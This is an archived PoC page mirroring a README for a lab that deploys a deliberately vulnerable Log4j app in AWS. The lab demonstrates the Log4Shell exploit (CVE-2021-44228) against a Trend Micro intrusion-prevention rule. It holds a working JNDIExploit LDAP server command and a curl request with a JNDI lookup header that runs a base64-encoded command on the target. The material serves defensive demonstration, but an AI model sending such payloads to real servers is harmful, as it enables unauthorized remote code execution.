POC详情: dd966fbbc56e6ed999703b1e49c1d3241922e225

来源
https://github.com/JustinDPerkins/C1-WS-LOG4SHELL
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
Quick Deploy to show case cve-2021-44228
介绍
# Cloud One - Workload Security Log4Shell
This repo contains a quick deployment template to showcase CVE-2021-44228 LOG4SHELL exploit and Workload Security Intrusion Prevention

### Note on CFT deployment in AWS regions
- I only added AMI Id's for US-EAST-1, US-EAST-2, US-WEST-1, US-WEST-2, CA-CENTRAL-1, SA-EAST-1, EU-WEST-1.

## Deploy CloudFormation Template

Parameters to Define:
- **KeyPair**: Name of a current Key Pair
- **IPforSSH**: restrict SSH access to your IP. Default is 0.0.0.0/0

[![Launch Stack](https://cdn.rawgit.com/buildkite/cloudformation-launch-stack-button-svg/master/launch-stack.svg)](https://console.aws.amazon.com/cloudformation/home#/stacks/new?stackName=c1-ws-log4shell&templateURL=https://aws-workshop-c1as-cft-templates.s3.amazonaws.com/c1-ws-log4shell.yaml)

![architecture](images/architecture.png)

---

## After CloudFormation Template Deployment

## 1. SSH into EC2 instance(Shell A)
    ```bash
    sudo su
    <Deploy Workload Security Agent deployment script with Linux Policy attached.>
    ```
![deployment_script](images/deploymentscript.png)

## 2. In Cloud One-WS: Assign IPS rule for CVE-2021-44228 to linux machine
    - IPS rule number: **1011242** or **1008610**
    - Assign rule and change to **Detect Only** for now.
    - Accept all rule dependencies.

![Click here for additional coverage on Apache Log4j "Log4Shell" Remote Code Execution 0-Day Vulnerability (CVE-2021-44228)](https://success.trendmicro.com/solution/000289940)
    
![ips_rule](images/ipsrule.png)
    
![detect_only](images/detectonly.png)

---

## 3. Start docker app(Shell A)

```bash
cd log4shell-vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
```
![docker_run](images/dockerstart.png)

---

## 4. Open Second SSH session(Shell B) and run command to create LDAP server
* [JNDIExploit](https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2) provided by feihong-cs before it was removed from GitHub.
```bash
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
```

## 5. Run Exploit
- Open new SSH session(Shell C)

```bash
# will execute 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
```
Notice the output(Shell B) of JNDIExploit, showing it has sent the malicious LDAP response and served the second-stage payload:

![shell-b](images/shell-b.png)

---

## 6. Confirm RCE was successful with the creation of pwned.txt file inside the running container's /tmp directory. 
- Using Shell C

```bash
docker exec vulnerable-app ls /tmp
```
![shell-c](images/shell-c.png)

---

## Repeat attack this time with IPS rule set to **Prevent**


## Reference
- Thank you [christophetd](https://github.com/christophetd/log4shell-vulnerable-app) for providing the vulnerable Spring Boot web application.
- Trend Micro Success: https://success.trendmicro.com/solution/000289940
- This web-based tool can help identify server applications that may be affected by the Log4Shell: https://log4j-tester.trendmicro.com/
文件快照

 [4.0K]  /data/pocs/dd966fbbc56e6ed999703b1e49c1d3241922e225
├── [4.9K]  cloudformation.yaml
├── [4.0K]  images
│   ├── [ 17K]  architecture.png
│   ├── [ 62K]  deploymentscript.png
│   ├── [ 46K]  detectonly.png
│   ├── [ 16K]  dockerstart.png
│   ├── [ 29K]  ipsrule.png
│   ├── [ 22K]  shell-b.png
│   └── [ 19K]  shell-c.png
└── [3.0K]  README.md

1 directory, 9 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。